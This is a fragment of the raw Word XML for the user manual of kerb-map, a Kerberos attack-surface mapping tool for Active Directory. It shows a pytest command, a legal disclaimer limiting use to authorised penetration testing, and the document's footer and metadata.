              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python -m pytest tests/test_scorer.py -v</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:name="13__Legal_Disclaimer" w:id="73"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">13. Legal Disclaimer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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CC0000" w:sz="12"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="1"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFF5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">IMPORTANT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">kerb-map is designed exclusively for authorised penetration testing, red team engagements, and security assessments conducted with explicit written permission from the system owner.</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Unauthorised use of kerb-map against systems you do not own or do not have explicit permission to test is illegal in most jurisdictions and may violate the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act, or equivalent legislation.</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The authors accept no liability for misuse. It is the operator’s sole responsibility to ensure that all testing is conducted within the scope of a valid authorisation agreement.</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By using kerb-map, you acknowledge that you have obtained proper authorisation and understand the potential impact of running security scanning tools against production Active Directory environments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">For questions about responsible use, licensing, or contributions, refer to the project’s README.md or open an issue on the project repository.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026"/>
      </w:tabs>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">kerb-map v1.1 — For authorized engagements only</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0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:i/>
        <w:iCs/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">KERB-MAP User Manual — Kerberos Attack Surface Mapper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000000"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="18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2026-03-19T10:16:32.852Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-19T10:16:32.853Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>